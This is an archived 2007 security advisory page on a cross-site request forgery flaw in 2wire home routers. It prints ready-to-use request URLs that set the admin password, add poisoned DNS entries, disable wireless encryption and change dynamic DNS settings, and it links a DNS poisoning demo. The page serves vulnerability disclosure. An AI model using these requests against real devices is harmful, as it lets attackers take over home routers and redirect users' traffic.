SecurityReason - Cross Site Request Forgery in 2wire routers

Register | Forget Password | Login

	SecurityReason
News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

	WLB
WLB Database

Send to WLB

About WLB

	RSS
News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

	Corporate
Contact

About us

	Services
SecurePHP


	Note
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive : exploit()securityreason()com

Details : SecurityAlert

Topic :

Cross Site Request Forgery in 2wire routers

SecurityAlert : 3026

CVE : CVE-2007-4389

CVE : CVE-2007-4388

CVE : CVE-2007-4387

SecurityRisk : High alert

alert

(About)

Remote Exploit : Yes

Local Exploit : No

Exploit Given : Yes

Credit : hkm

Published : 20.08.2007

Affected Software :

1701HG, 2071 Gateway
v3.17.5, 5.29.51 Password Not Set (default)

Advisory Text :

Cross Site Request Forgery in 2wire routers

Vulnerable Routers: 1701HG, 2071 Gateway
Software: v3.17.5, 5.29.51 Password Not Set (default)

Greetz a la Comunidad Underground de México, y a los
que me ayudaron a probarlo: Preth00nker, nitr0us, ...
hkm (at) hakim (dot) ws [email concealed]

I. Background
-------------
This is the most popular router in Mexico and the default installation from
the ISP has no system password.

II. Vuln
----------------
It is possible to send a request to the router that will modify its
configuration.

It does not validate POST, or Referer or Anything...

II. Exploit
----------------
We just need the client to do a request to the router with the
configuration we desire.

[examples]

Set a password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&E
NABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS

Add names to the DNS (216.163.137.3 www.prueba.hkm):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAM
E=www.prueba.hkm&ADDR=216.163.137.3

Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&N
AME=encrypt_enabled&VALUE=0

Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&I
P_DYNAMIC=TRUE

Disable the Firewall
Reset the device
Etc...

DNS Poisoning demo: http://www.hakim.ws/2wire/demodns.html

Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.

	Alert
BSD libc (strfmon) Multiple vulnerabilities - 2008-03-25 Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected BSD systems.


	Apache
» Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability

» Apache Tomcat information disclosure vulnerability

» Apache Tomcat XSS vulnerability

» Apache-SSL memory disclosure



	PHP
» PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

» PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

» PHP 5.2.5 and prior : *printf() functions Integer Overflow

» PHP 5.2.5 cURL safe_mode bypass

Copyright © SecurityReason. All Rights Reserved.